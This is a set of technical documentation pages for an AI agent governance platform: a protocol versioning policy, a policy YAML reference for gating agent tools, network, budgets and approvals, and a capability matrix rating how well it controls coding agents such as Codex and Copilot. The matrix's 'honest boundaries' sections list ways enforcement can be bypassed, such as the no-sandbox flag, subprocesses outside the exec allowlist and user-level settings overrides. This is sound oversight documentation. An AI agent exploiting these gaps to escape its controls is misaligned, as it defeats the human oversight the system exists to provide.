PR #1059 (Dependabot)	Bumped the workspace `tower-http` dependency from `0.6.11` to `0.7.0` in root `Cargo.toml` (HTTP middleware used by `aa-api` / `aa-gateway`). Compiles and passes the full workspace test suite + clippy unchanged. A transitive `tower-http 0.6` remains in `Cargo.lock` via an upstream dependency; both coexist. No version bump.	None — internal third-party dependency bump; no public API, protocol, or ABI change

Last updated: 2026-06-16 by Chisanan232

Protocol versioning policy

Use this page to decide how a protocol change must be versioned before you ship it. It defines the versioning scheme, the rules for classifying a change as breaking or non-breaking, and the deprecation lifecycle. Every change to proto schemas, JSON schemas, IPC framing, and wire formats is governed by this policy.

The short version: add fields and RPCs freely (MINOR); never remove, rename, or retype an existing field without a MAJOR bump and a migration guide.

Versioning scheme

The protocol uses Semantic Versioning (MAJOR.MINOR.PATCH):

Component	Meaning
`MAJOR`	Breaking change — existing SDKs must be updated to remain compatible
`MINOR`	Non-breaking addition — new fields, new RPCs, new enum values (backward compatible)
`PATCH`	Non-breaking fix — documentation corrections, description updates, no wire format change

The current protocol version is protocol/v1 (pre-stable: v0.0.1).

Change classification

Non-breaking changes (MINOR or PATCH)

These changes can be made without requiring SDK updates:

Change	Classification	Reason
Add an optional field to a message	MINOR	Existing decoders ignore unknown fields (proto3)
Add a new RPC method to a service	MINOR	Existing clients simply don’t call it
Add a new enum value	MINOR	Unknown enum values fall back to `_UNSPECIFIED = 0`
Add a new service	MINOR	Existing clients don’t depend on it
Rename a field description (not the field itself)	PATCH	No wire format change
Fix a typo in a comment or doc string	PATCH	No wire format change
Tighten a JSON Schema description	PATCH	No wire format change

Breaking changes (MAJOR)

These changes require a MAJOR version bump and a migration guide:

Change	Classification	Reason
Remove a field from a message	MAJOR	Existing encoders/decoders break
Rename a field	MAJOR	Field number stays but name change breaks JSON/gRPC-gateway
Change a field’s type	MAJOR	Wire encoding changes
Change a field number	MAJOR	Proto3 wire encoding is field-number based
Remove an RPC method	MAJOR	Existing callers get `UNIMPLEMENTED` errors
Remove an enum value	MAJOR	Existing code holding that value breaks
Add a required field	MAJOR	Existing messages missing the field become invalid
Change a JSON Schema `type` constraint	MAJOR	Existing valid documents become invalid
Narrow a JSON Schema constraint (e.g. add `minLength`)	MAJOR	Previously valid values may now fail validation

Deprecation lifecycle

Before a breaking change is introduced, the affected field, method, or value must go through a formal deprecation period:

Deprecated in vX.Y  →  Removed no earlier than v(X+2).0

Steps

Deprecate — Mark the item as deprecated in the proto or JSON Schema with a deprecated annotation and a description explaining what to use instead. Bump MINOR version.
Announce — Add an entry to CHANGELOG.md under Deprecated. Notify SDK maintainers.
Support period — The deprecated item remains fully functional for at least two MAJOR versions after the deprecating release.
Remove — Remove the item in a future MAJOR release (no earlier than v(X+2).0). Add a migration guide. Update CHANGELOG.md under Removed.

Runtime backward compatibility

Runtime N must support SDKs speaking protocol N-1.

This means an aa-runtime at protocol v2.x must continue to accept connections from SDKs still using protocol v1.x. SDKs have a two-major-version window to migrate before a runtime drops support for the older protocol.

Example: deprecating a field

// Before (v1.2 — field is still used)
message AgentId {
  string org_id   = 1;
  string team_id  = 2;
  string agent_id = 3;  // original field name
}

// After (v1.3 — field deprecated, replacement added)
message AgentId {
  string org_id   = 1;
  string team_id  = 2;
  string agent_id = 3 [deprecated = true];  // deprecated: use `id` instead (removed in v3.0)
  string id       = 4;  // replacement field
}

CHANGELOG entry at v1.3:

### Deprecated
- `AgentId.agent_id` — use `AgentId.id` instead. Will be removed in v3.0.

Example migration guide — `AgentId.agent_id` → `AgentId.id`

Breaking change introduced in: protocol/v3.0
Deprecated since: protocol/v1.3
Affected SDK versions: All SDKs using AgentId.agent_id
Estimated migration effort: Low

What changed

The field AgentId.agent_id (field number 3) was removed. Use AgentId.id (field number 4) instead. The semantic meaning is identical — the field carries the agent’s own identifier (DID).

Before (protocol/v1.x — v2.x)

Proto encoding:

AgentId {
  org_id:   "acme"
  team_id:  "platform"
  agent_id: "did:key:z6Mk..."   // field 3
}

Python SDK:

agent_id = AgentId(org_id="acme", team_id="platform", agent_id="did:key:z6Mk...")

After (protocol/v3.0+)

Proto encoding:

AgentId {
  org_id:  "acme"
  team_id: "platform"
  id:      "did:key:z6Mk..."    // field 4
}

Python SDK:

agent_id = AgentId(org_id="acme", team_id="platform", id="did:key:z6Mk...")

Migration steps

Search your codebase for all usages of AgentId.agent_id (or the SDK-language equivalent).
Replace each with AgentId.id.
Run your SDK’s conformance test suite against a aa-runtime at protocol/v3.0.
Deploy the updated SDK before upgrading aa-runtime past v2.x (runtime v2.x still supports protocol/v1 per the backward compatibility rule).

Runtime protocol	Must support
protocol/v1	protocol/v1 only (first version)
protocol/v2	protocol/v1, protocol/v2
protocol/v3	protocol/v2, protocol/v3 (v1 support may be dropped)

For the blank template to copy when writing a new migration guide, see docs/migration/template.md.

Last updated: 2026-06-11 by Chisanan232

Policy YAML Reference

A complete reference for the governance policy document the gateway loads, validates, and enforces. Every field below is grounded in the policy engine’s own types (aa-gateway/src/policy/) and the shared core (aa-core). Validate any file locally before applying it:

aasm policy validate path/to/policy.yaml

Validation prints Policy is valid: <path> and exits 0 on success. Hard constraint violations print error: <field>: <message> and exit 1. Unrecognised keys are warnings, not errors — the file still validates, but the unknown key is ignored at runtime, so a typo’d field silently does nothing. Treat warnings as bugs.

Document formats

A policy may be written in either of two equivalent shapes.

Envelope format (recommended)

A Kubernetes-style wrapper. metadata.name and metadata.version are surfaced in tooling; the actual policy lives under spec:.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: my-policy
  version: "1.0.0"
  description: Optional free text.
spec:
  budget:
    daily_limit_usd: 20.0

Flat format

The same content with no wrapper — every section sits at the top level. There is no metadata, so name and version are absent.

version: "1.0"
budget:
  daily_limit_usd: 20.0

The validator auto-detects the format: if a top-level spec: key is present it parses the envelope, otherwise it parses the flat form. The field tables below describe the policy body (the content of spec:, or the whole document in flat form).

Top-level fields

Field	Type	Default	Example
`version`	string	(none)	`version: "1.0"`
`scope`	string	`global`	`scope: team:platform`
`approval_timeout_secs`	integer > 0	`300`	`approval_timeout_secs: 600`
`network`	section	(omitted → unrestricted)	see network
`schedule`	section	(omitted → always active)	see schedule
`budget`	section	(omitted → no cap)	see budget
`data`	section	(omitted → no scan rules)	see data
`tools`	map	(empty)	see tools
`capabilities`	section	(omitted)	see capabilities
`approval`	section	(omitted)	see approval

scope accepts one of: global, org:<id>, team:<id>, agent:<uuid>, or tool:<name>. The cascade evaluates policies in Global → Org → Team → Agent → Tool order, most-restrictive-wins. An agent: scope requires a valid hyphenated UUID; a team:/org:/tool: identifier must not be empty. Any other shape is a validation error.

Complete example policy

A single policy exercising every section. This validates cleanly.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: complete-example
  version: "1.0.0"
  description: Demonstrates every policy section.
spec:
  scope: team:platform
  approval_timeout_secs: 300

  network:
    allowlist:
      - api.openai.com
      - "*.anthropic.com"

  schedule:
    active_hours:
      start: "09:00"
      end: "18:00"
      timezone: "Asia/Taipei"

  budget:
    daily_limit_usd: 25.0
    monthly_limit_usd: 500.0
    timezone: "Asia/Taipei"
    action_on_exceed: deny

  data:
    credential_action: redact_only
    sensitive_patterns:
      - "sk-[A-Za-z0-9]{20,}"

  capabilities:
    allow:
      - file_read
      - network_outbound
      - mcp_tool:git
    deny:
      - terminal_exec

  approval:
    timeout_seconds: 600
    escalation_role: org-admin

  tools:
    read_file:
      allow: true
      limit_per_hour: 120
    write_file:
      allow: true
      requires_approval_if: "path starts_with \"/etc\""
    shell:
      allow: false

`network`

Controls outbound (egress) connections. Backed by NetworkPolicy.

Field	Type	Default	Example
`allowlist`	list of glob strings	`[]`	`allowlist: ["api.openai.com"]`

Glob pattern semantics

The matcher (aa_core::policy::is_host_allowed_by_egress_allowlist) supports exactly three pattern shapes:

Pattern	Matches	Does not match
`api.openai.com`	exact host, case-insensitive	`chat.openai.com`, `openai.com`
`*.openai.com`	any sub-domain at any depth: `api.openai.com`, `a.b.openai.com`	the bare apex `openai.com`; attacker suffixes like `evilopenai.com`
`*`	every host (escape hatch)	—

Matching is case-insensitive (DNS labels are case-insensitive per RFC 4343). The leftmost-label wildcard *. requires at least one label before the suffix, so *.openai.com deliberately excludes the bare openai.com — list both if you need the apex too.

Default behavior

No network: section → egress is unrestricted (default-open). The caller’s posture wins.
network: present but allowlist empty or omitted → also unrestricted. An empty list means “no restriction”, not “deny all”. To deny by default, list only the hosts you trust — anything not matched is then denied.

An allowlist entry that is empty or whitespace-only is a validation error (network.allowlist[i]: allowlist entry must not be empty).

`tools`

Per-tool allow/deny, rate limiting, and approval gating. A map keyed by tool name; each value is a ToolPolicy.

Field	Type	Default	Example
`allow`	bool	`true`	`allow: false`
`limit_per_hour`	integer	(unlimited)	`limit_per_hour: 10`
`requires_approval_if`	expression string	(never)	`requires_approval_if: "path starts_with \"/etc\""`

allow defaults to true when omitted, so a tool entry that only sets limit_per_hour is still permitted.

The `*` wildcard tool

A tool named * is the catch-all entry for any tool without its own named rule. Pair "*": { allow: false } with explicit allow: true entries to get deny-by-default behaviour (see the Strict example). Conversely "*": { allow: true } is an explicit allow-everything default.

tools:
  "*":
    allow: false      # deny every tool not named below
  read_file:
    allow: true       # ...except read_file

`requires_approval_if` expression syntax

requires_approval_if holds a boolean expression evaluated against the in-flight action. When it evaluates true, the action is routed to human-in-the-loop approval instead of executing immediately. The expression is parsed and validated at load time (aa-gateway/src/policy/expr.rs): an empty expression, an unknown variable, or an unknown governance level (L4+) is a hard validation error.

Fail-safe at runtime: if the engine cannot evaluate an expression (parse error, malformed action), it returns true — approval required — never a silent allow.

Grammar

expr       := clause (combinator clause)*
clause     := field op literal
combinator := AND | OR          # AND binds tighter than OR; no parentheses

AND/OR are uppercase. There are no parentheses in this version; an expression is OR-groups of AND-connected clauses.

Operators

Operator	Meaning	Operand types
`==`	equal	string, number, governance level, risk tier
`!=`	not equal	string, number, governance level, risk tier
`>` `>=` `<` `<=`	ordered comparison	number, governance level, risk tier, duration
`contains`	substring / membership	string
`starts_with`	prefix match	string
`in`	value in list	string against `["a", "b"]`
`not_in`	value not in list	string against `["a", "b"]`

Literals

String: double-quoted, e.g. "/etc". Escapes: \" and \\.
Number: integer or float, e.g. 10, 1.5.
List: ["read", "write"] — for in / not_in.
Governance level: L0, L1, L2, L3 (ordered). Any other L<n> is a validation error.
Risk tier: Low, Medium, High, Critical (ordered).
Duration: human-readable, digit-leading, e.g. 24h, 30m, 1h30m (compared as seconds — 24h == 86400).

Operands (variables)

The variable on the left of each clause must be one of the names the evaluator knows. Unknown names are rejected at load time (with a typo suggestion when close). The recognised variables:

Variable	Resolves against	Type
`tool`	the called tool’s name	string
`path`	a file-access path	string
`url`	a network-request URL	string
`method`	a network-request HTTP method	string
`command`	a process-exec command line	string
`args.<key>[.<nested>]`	a JSON field inside a tool call’s `args` body	string / number
`tool_result.<key>[.<nested>]`	a JSON field inside a tool result	string / number
`tool_result`	the entire serialised tool-result body	string (`contains`/`starts_with` only)
`governance_level`	the agent’s governance level	level (`L0`–`L3`)
`agent.depth`	delegation depth	number
`agent.risk_tier`	the agent’s risk tier	tier
`agent.age`	seconds since the agent registered	number / duration
`agent.parent_agent_id`	the agent’s parent id	string
`agent.team_id`	the agent’s team id	string
`agent.children_count`	number of direct children	number
`agent.is_root`	`1` when depth == 0, else `0`	number (`==`/`!=`)
`agent.is_leaf`	`1` when children_count == 0, else `0`	number (`==`/`!=`)
`team.active_agents`	running agents in the team	number
`team.parallel_agents`	alias of `team.active_agents`	number
`team.budget_remaining`	remaining monthly budget	number
`child.tool`	tool names across direct children	string
`child.risk_tier`	risk tier of a child being spawned	tier
`parent.risk_tier`	the parent agent’s risk tier	tier
`source.team_id`	sending team of a message	string
`target.team_id`	recipient team of a message	string
`target.channel_id`	message channel id	string

The args.<key> and tool_result.<key> forms walk a JSON pointer (args.path → /path, args.headers.authorization → /headers/authorization). They are null-safe: a non-matching action variant, malformed JSON, or an unresolved pointer evaluates to false (no match), not fail-safe-true.

Example expressions

Each of the following is a valid requires_approval_if value:

"path starts_with \"/etc\"" — gate writes under /etc.
"args.path contains \"/etc\"" — same idea, reading the path out of a tool call’s JSON args.
"command contains \"sudo\"" — gate any shell command invoking sudo.
"url contains \"internal\"" — gate requests to internal hosts.
"tool == \"delete_database\"" — gate one specific tool by name.
"agent.depth > 1" — gate actions from agents deeper than one delegation hop.
"agent.children_count > 10" — gate agents that have spawned many children.
"governance_level >= L2" — gate when the agent runs at L2 (Enforce) or above.
"agent.risk_tier >= High" — gate high- and critical-risk agents.
"agent.age < 24h" — gate brand-new agents (registered under a day ago).
"method == \"DELETE\" OR method == \"PUT\"" — gate destructive HTTP verbs.
"target.team_id in [\"finance\", \"security\"]" — gate messages sent to sensitive teams.
"tool_result contains \"sk-\"" — gate when the response body looks like it carries a secret.
"command contains \"rm\" AND agent.is_root == 0" — gate rm from non-root (delegated) agents only.

Divergence note. Earlier drafts of this ticket used illustrative expressions such as "call_count > 10". There is no call_count variable in the engine; per-tool rate limiting is expressed with the limit_per_hour field instead, and “how many children” is agent.children_count. Only the variables in the table above are accepted — anything else fails validation.

`data`

Sensitive-data / credential handling. Backed by DataPolicy.

Field	Type	Default	Example
`sensitive_patterns`	list of regex strings	`[]`	`sensitive_patterns: ["sk-[A-Za-z0-9]{20,}"]`
`credential_action`	enum	`redact_only`	`credential_action: block`

`credential_action` values

Value	Behaviour
`block`	Refuse the action; the engine returns `Deny` (reason `credential detected`) and the payload never reaches upstream.
`redact_only`	(default) Forward a redacted form of the payload upstream. Preserves historical behaviour.
`alert_only`	Forward the unmodified payload and raise an alert. A deliberate downgrade for low-risk, audit-only modes.

Any other value is a validation error.

`sensitive_patterns` regex syntax

Each entry is a regular expression compiled by the Rust regex crate (RE2-style — linear-time, no backtracking, no look-around or backreferences). An invalid regex is a hard validation error (data.sensitive_patterns[i]: invalid regex: ...). Backslashes must be escaped for YAML, e.g. a US-SSN pattern is written "\\b\\d{3}-\\d{2}-\\d{4}\\b".

Built-in vs custom

The runtime ships a built-in credential scanner (aa-security) that always runs, independent of sensitive_patterns. It is an Aho-Corasick literal matcher covering common high-confidence secret prefixes, including:

API keys: sk- (OpenAI), sk-ant- (Anthropic), AKIA… (AWS), GCP service accounts, Azure connection strings.
Tokens: ghp_ / ghs_ (GitHub), xoxb- / xoxp- / xoxa- (Slack).
Database URLs: postgres://, mysql://, mongodb://.
Private keys: RSA, EC, OpenSSH, PKCS#8, PGP PEM blocks.

sensitive_patterns is the custom layer on top: your own regexes for organisation-specific identifiers (employee IDs, internal hostnames, PII shapes like SSNs or emails) that the built-in literal set does not cover.

Performance notes

The built-in scanner is pre-compiled once at construction; each scan pays zero pattern-compilation cost and runs in a single Aho-Corasick pass.
Custom sensitive_patterns are compiled by the regex crate. Because that engine is backtracking-free, match time is linear in the input length — there is no catastrophic-backtracking risk. Still, keep the pattern list small and anchored where possible; each pattern is an independent scan over the payload.

`budget`

Spend limits in US dollars. Backed by BudgetPolicy.

Field	Type	Default	Example
`daily_limit_usd`	float > 0	(no cap)	`daily_limit_usd: 20.0`
`monthly_limit_usd`	float > 0, ≥ daily	(no cap)	`monthly_limit_usd: 400.0`
`org_daily_limit_usd`	float > 0	(no cap)	`org_daily_limit_usd: 100.0`
`org_monthly_limit_usd`	float > 0, ≥ org daily	(no cap)	`org_monthly_limit_usd: 2000.0`
`timezone`	IANA tz string	`UTC`	`timezone: "America/New_York"`
`action_on_exceed`	enum	`deny`	`action_on_exceed: suspend`
`window`	duration string	(calendar day)	`window: "1h30m"`

Currency

All limits are USD. There is no currency selector — costs are computed from a USD pricing table and compared against these USD caps.

Per-agent vs global vs per-org

Spend is tracked per agent, and rolled up to team, org, and global totals.

daily_limit_usd / monthly_limit_usd are the global caps (applied to the aggregate).
org_daily_limit_usd / org_monthly_limit_usd add an independent per-org cap, enforced separately from the global cap. Either can trip first.

Timezone & reset behaviour

timezone (an IANA name such as Europe/London) sets the boundary at which the daily and monthly counters reset. It defaults to UTC. An unparseable name is a validation error (budget.timezone: '<x>' is not a valid IANA timezone name).

Daily reset: counters reset at local midnight in the configured timezone. Reset is lazy — it happens on the next spend event once the stored date is earlier than “today” in that timezone, so an idle agent’s counter simply carries the old date until its next request.
Monthly reset: triggers when the stored month differs from the current month in the configured timezone.
window overrides the calendar-day rollover with a fixed rolling window (humantime duration, e.g. 5s, 30m, 1h). Must be a positive duration.

`action_on_exceed`

Value	Behaviour
`deny`	(default) Deny individual over-budget requests but keep the agent active.
`suspend`	Suspend the agent entirely until the budget resets.

Validation rules: every limit must be > 0; monthly_limit_usd must be ≥ daily_limit_usd (and the same for the org pair). Equal monthly/daily is allowed; monthly without daily is allowed.

`schedule`

Time-of-day gating. Backed by SchedulePolicy → ActiveHours.

Field	Type	Default	Example
`active_hours.start`	`HH:MM` 24h	(required if `active_hours` present)	`start: "09:00"`
`active_hours.end`	`HH:MM` 24h	(required if `active_hours` present)	`end: "18:00"`
`active_hours.timezone`	IANA tz string	(required if `active_hours` present)	`timezone: "Asia/Taipei"`

When active_hours is set, the agent is permitted to run only inside the [start, end) window in the given timezone. Omitting schedule entirely means the agent is always active.

Validation rules

start and end must be zero-padded HH:MM (e.g. 09:00, not 9:00), hours 00–23, minutes 00–59.
start must be earlier than end (string comparison on HH:MM). A window that wraps past midnight (e.g. 22:00–06:00) is rejected — model overnight coverage as two policies or a single all-hours policy instead.
All three fields are required once active_hours is present.

IANA timezone strings

Use canonical IANA names: UTC, America/New_York, Europe/London, Asia/Taipei, Asia/Tokyo, etc. Fixed offsets like GMT+8 are not IANA names and should be avoided.

Multiple active windows

A single policy expresses one window. To grant several disjoint windows (e.g. a morning and an afternoon block), apply multiple policies at different scopes in the cascade, or widen to a single enclosing window.

DST & timezone edge cases

Because the window is interpreted in a named IANA zone (not a fixed offset), it follows daylight-saving transitions automatically — 09:00–18:00 stays “9am to 6pm local” across the spring-forward and fall-back shifts. Two edge cases are inherent to wall-clock time:

Spring forward (clocks jump, e.g. 02:00→03:00): a start/end that names the skipped hour refers to a wall-clock time that does not exist on that date. Prefer windows outside the local DST gap.
Fall back (clocks repeat an hour): a time inside the repeated hour occurs twice. The window still opens and closes, but the repeated wall-clock hour is ambiguous. Avoid placing a boundary inside the local fall-back hour for predictable behaviour.

Keeping boundaries away from the very early-morning DST transition hours sidesteps both cases.

`capabilities`

Coarse-grained allow/deny of action categories. Backed by aa_core::CapabilitySet. Merged across the scope cascade with parent-deny-wins semantics.

Field	Type	Default	Example
`allow`	list of capability strings	`[]`	`allow: ["file_read"]`
`deny`	list of capability strings	`[]`	`deny: ["terminal_exec"]`

Recognised capability strings:

String	Capability
`file_read`	read the filesystem
`file_write`	write the filesystem
`network_outbound`	outbound network
`network_inbound`	inbound network
`terminal_exec`	execute shell commands
`agent_spawn`	spawn child agents
`mcp_tool:<name>`	use a named MCP tool, e.g. `mcp_tool:git`
`model:<name>`	use a named model, e.g. `model:gpt-4o`

An unknown capability string, or an mcp_tool: / model: with an empty name, is a validation error.

`approval`

Per-policy overrides for the approval-escalation routing. Backed by ApprovalPolicy. When omitted, team routing defaults apply.

Field	Type	Default	Example
`timeout_seconds`	integer	(team default)	`timeout_seconds: 600`
`escalation_role`	string	(team default)	`escalation_role: org-admin`

Note the distinction between the top-level approval_timeout_secs (the global approval timeout for the document, default 300) and the approval.timeout_seconds override inside this section.

Three complete example policies

These ship under policy-examples/ and all pass aasm policy validate.

Strict

Deny all unknown tools, $5/day budget, block all sensitive data. See policy-examples/strict.yaml.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: strict
  version: "1.0.0"
  description: >
    Lock everything down. Deny all unknown tools, cap spend at $5/day,
    and block any payload that trips the sensitive-data scanner. Use this
    as the baseline for high-risk or untrusted agents.
spec:
  scope: global

  network:
    # Empty-but-present allowlist still allows any host (an empty list means
    # "no restriction"). To actually restrict egress, list the exact hosts.
    allowlist:
      - api.openai.com
      - api.anthropic.com

  budget:
    daily_limit_usd: 5.0
    monthly_limit_usd: 100.0
    timezone: "UTC"
    action_on_exceed: suspend

  data:
    # Block the payload outright when the scanner finds a credential.
    credential_action: block
    sensitive_patterns:
      - "sk-[A-Za-z0-9]{20,}"
      - "AKIA[0-9A-Z]{16}"
      - "-----BEGIN [A-Z ]*PRIVATE KEY-----"

  # Capability floor: deny the dangerous categories regardless of per-tool rules.
  capabilities:
    deny:
      - terminal_exec
      - file_write
      - network_inbound

  # Deny every tool that is not explicitly allowed below.
  tools:
    "*":
      allow: false
    read_file:
      allow: true
      limit_per_hour: 60
    http_get:
      allow: true
      limit_per_hour: 30
      requires_approval_if: "url contains \"internal\""

Balanced

Allowlist common tools, $20/day budget, PII detection on (redact). See policy-examples/balanced.yaml.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: balanced
  version: "1.0.0"
  description: >
    A pragmatic default for trusted internal agents. Allowlist the common
    tools, cap spend at $20/day, and detect PII / credentials by redacting
    rather than blocking so workflows keep running.
spec:
  scope: global

  network:
    allowlist:
      - api.openai.com
      - "*.anthropic.com"
      - "*.slack.com"
      - api.github.com

  schedule:
    active_hours:
      start: "08:00"
      end: "20:00"
      timezone: "America/New_York"

  budget:
    daily_limit_usd: 20.0
    monthly_limit_usd: 400.0
    timezone: "America/New_York"
    action_on_exceed: deny

  data:
    # Redact-only: forward a scrubbed payload upstream instead of refusing it.
    credential_action: redact_only
    sensitive_patterns:
      # PII detection: US SSN and a generic email address.
      - "\\b\\d{3}-\\d{2}-\\d{4}\\b"
      - "\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}\\b"

  tools:
    read_file:
      allow: true
      limit_per_hour: 120
    http_get:
      allow: true
      limit_per_hour: 60
    web_search:
      allow: true
      limit_per_hour: 30
    write_file:
      allow: true
      requires_approval_if: "path starts_with \"/etc\" OR path contains \"..\""
    shell:
      allow: true
      limit_per_hour: 10
      requires_approval_if: "command contains \"rm\" OR command contains \"sudo\""

Audit-only

Log everything, enforce nothing. See policy-examples/audit-only.yaml.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: audit-only
  version: "1.0.0"
  description: >
    Observe everything, enforce nothing. Every tool is allowed and the
    sensitive-data scanner only raises an alert without modifying or blocking
    the payload. Use this to map an agent's behaviour before tightening rules.
spec:
  scope: global

  # No `network:` clause → egress is unrestricted (default-open).
  # No `budget:` clause → no spend cap is enforced.

  data:
    # alert_only: forward the unmodified payload and raise an alert side-effect.
    # Deliberate downgrade documented for low-risk, audit-only modes.
    credential_action: alert_only
    sensitive_patterns:
      - "sk-[A-Za-z0-9]{20,}"

  tools:
    # Wildcard allow: every tool is permitted; findings are logged, not enforced.
    "*":
      allow: true

L0–L3 Governance Capability Matrix

This document defines the four governance tiers used across all AI Agent Assembly dev-tool adapters and declares the tier attained by each supported tool for each capability dimension. It is the single source of truth for “what does L2 mean for this tool” — adapter implementation Stories reference this document rather than defining tiers ad hoc.

Status: Codex, GitHub Copilot, and Windsurf Cascade tiers are final (adapters merged). Claude Code (AAASM-201) and SaaS coding-agent (AAASM-918) rows are placeholders pending those adapters landing.

Tier definitions

Tier	Name	What AAASM can do
L0	Discover	Auto-inventory the tool: name, version, config file paths. No runtime hooks. AAASM knows the tool is present but cannot observe or affect its actions.
L1	Observe	Tool actions appear in the AAASM audit log. Policy rules are evaluated and results are visible to operators, but the tool is not blocked — it runs uninhibited. Provides real-time observability without enforcement.
L2	Enforce	Policy overlay is active. AAASM evaluates rules and blocks, redirects, or redacts violating actions while AAASM is running. The tool cannot bypass enforcement, but may operate without constraint if AAASM is offline.
L3	Native Governed	AAASM writes the tool’s own native configuration (settings files, sandbox config, MCP registry). Governance is baked into the tool’s startup state — even if AAASM goes offline, the last-written settings cap what the tool can do. Strongest enforcement tier.

Capability matrix

Rows are the seven governance capability dimensions. Columns are the four tiers. A cell answers: “At this tier, is this capability available?”

Capability	L0 Discover	L1 Observe	L2 Enforce	L3 Native Governed
Audit log capture	No	Yes — every action emits an audit event with agent attribution, timestamp, and tool context	Yes	Yes
Policy decision visibility	No	Yes — policy rules evaluated per action; results visible in dashboard and `aasm policy check`	Yes	Yes
MCP server allowlist enforcement	No	No — MCP server list is observed but not restricted	Yes — deny list enforced at proxy layer	Yes — allowed MCP server list written to tool’s native config; tool cannot load unlisted servers at startup
Terminal-exec block	No	No	Yes — exec calls intercepted at proxy or SDK layer; blocked when policy says deny	Partial — depends on tool-native sandbox support; see per-tool declarations below
File-write block	No	No	Yes — file-write events evaluated by policy; violations blocked at proxy or SDK layer	Partial — depends on tool-native sandbox support; see per-tool declarations below
Network-egress block	No	No	Yes — outbound HTTPS intercepted by `aa-proxy`; hosts not in allowlist receive 403	Partial — some tools support native network restrictions in their config; see per-tool declarations below
Sub-agent governance	No	Yes — spawned agents are registered and appear in the topology tree	Yes — child agents inherit parent’s policy scope; budget shared	Yes — spawned agents are registered with governing tool’s team ID at the native config level

Per-tool tier declarations

Codex

Adapter: AAASM-202 (Done) · Mechanism: sandbox policy sync + approval alignment + wrapper integration

Capability	Tier	Notes
Audit log capture	L2	Wrapper intercepts Codex API calls; audit events emitted for every tool invocation
Policy decision visibility	L2	Policy evaluated per call; decisions surfaced via `aasm topology` and dashboard
MCP server allowlist	L3	AAASM writes the Codex sandbox `allowed_mcp_servers` list at startup and on policy change
Terminal-exec block	L3	Codex sandbox natively restricts exec; AAASM syncs the allowed-commands list from policy
File-write block	L3	Codex sandbox file restrictions synced from AAASM policy (`allowed_paths`, `denied_paths`)
Network-egress block	L2	Proxy layer intercepts outbound HTTPS; Codex sandbox network restrictions also synced (belt-and-suspenders)
Sub-agent governance	L2	Sub-processes spawned by Codex register with AAASM via wrapper; inherit parent team policy

Honest boundaries for Codex:

If the user invokes Codex with --no-sandbox, all L3 enforcement is bypassed. AAASM detects this at L1 (audit event) but cannot enforce.
Codex sandbox restrictions apply to the Codex subprocess only; they do not restrict processes Codex spawns via subprocess.run() unless the sandbox’s exec allowlist is set correctly.
Approval-queue flows require AAASM gateway to be reachable; offline mode defaults to the policy’s offline_action (allow or deny).

GitHub Copilot

Adapter: AAASM-203 (Done) · Mechanism: VS Code settings alignment + MCP governance

Capability	Tier	Notes
Audit log capture	L1	VS Code extension telemetry hooks emit audit events for Copilot chat messages and inline suggestions
Policy decision visibility	L1	Policy decisions are visible in dashboard; enforcement is observability-only at this tier
MCP server allowlist	L3	AAASM writes `github.copilot.chat.mcp.enabled` and the allowed MCP server list to VS Code `settings.json` via the settings sync adapter
Terminal-exec block	L0	VS Code’s extension API does not expose a hook to block terminal commands initiated by Copilot. Blocking requires proxy layer (Layer 2) running alongside.
File-write block	L0	VS Code extension API provides no file-write veto for inline edits. Observable via audit but not blockable at the extension level.
Network-egress block	L1	Proxy layer can intercept outbound HTTPS from the VS Code process; no native Copilot setting restricts outbound hosts.
Sub-agent governance	L0	Copilot does not expose a sub-agent spawning API that AAASM can intercept at the extension level.

Honest boundaries for GitHub Copilot:

Terminal-exec and file-write enforcement require aa-proxy (Layer 2) running as a system-level MitM. The VS Code extension adapter alone cannot provide L2+ enforcement for these capabilities.
VS Code settings sync writes settings.json at the workspace level; a user can override at the user-settings level. Enterprise-grade enforcement requires VS Code managed device policies (outside AAASM scope).
Network-egress block via proxy does not cover VS Code’s built-in Copilot HTTPS calls unless the proxy CA is trusted by the VS Code process.

Windsurf Cascade

Adapter: AAASM-204 (Done) · Mechanism: admin settings sync + MCP registry control

Capability	Tier	Notes
Audit log capture	L1	Windsurf telemetry hooks emit audit events for Cascade tool calls and agent spawning
Policy decision visibility	L1	Policy evaluated and results visible; enforcement passive at this tier
MCP server allowlist	L3	AAASM writes the Windsurf MCP registry (`~/.codeium/windsurf/mcp_registry.json`) via admin settings sync; unlisted servers are not loaded at Windsurf startup
Terminal-exec block	L1	Cascade terminal actions are observable; no Windsurf-native exec block API exists. L2 blocking requires proxy layer.
File-write block	L1	File edits are observable in audit log; no Windsurf-native veto API. L2 blocking requires proxy layer.
Network-egress block	L1	Outbound HTTPS interceptable by proxy layer; no Windsurf-native network restriction config.
Sub-agent governance	L1	Windsurf Cascade multi-agent flows are observable; child agents appear in topology but do not inherit policy scope automatically without the SDK.

Honest boundaries for Windsurf Cascade:

Windsurf does not expose a sandbox mode. L2 enforcement for exec and file operations requires aa-proxy running at the system level.
Admin settings sync requires Windsurf’s config directory to be writable by the AAASM process. In multi-user environments, this requires elevated permissions or a per-user deployment.
MCP registry control only governs MCP servers loaded by Windsurf at startup. A user can manually add servers to a workspace-level config that overrides the registry.

Claude Code

Adapter: AAASM-201 — Pending (in backlog) · Placeholder — do not rely on these declarations until AAASM-201 is merged

Capability	Tier	Notes
Audit log capture	TBD	—
Policy decision visibility	TBD	—
MCP server allowlist	TBD	—
Terminal-exec block	TBD	—
File-write block	TBD	—
Network-egress block	TBD	—
Sub-agent governance	TBD	—

SaaS Coding-Agent (Claude.ai / ChatGPT / Codex-web)

Adapter: AAASM-918 — Pending (in backlog) · Placeholder — tier declarations incomplete

Capability	Tier	Notes
Audit log capture	L1	SaaS agents emit L0–L1 events via the observability adapter (browser extension or API-level hook); execution is remote and not fully inspectable
Policy decision visibility	L1	Policy decisions are visible but enforcement is not possible at the cloud execution layer
MCP server allowlist	L0	Cloud-hosted tools do not expose an MCP allowlist config that AAASM can control
Terminal-exec block	L0	Remote execution; no AAASM enforcement path
File-write block	L0	Remote execution; no AAASM enforcement path
Network-egress block	L0	Remote execution; egress is controlled by the SaaS provider, not AAASM
Sub-agent governance	L0	SaaS multi-agent orchestration is opaque; AAASM cannot intercept spawn events

Honest boundaries for SaaS coding-agents:

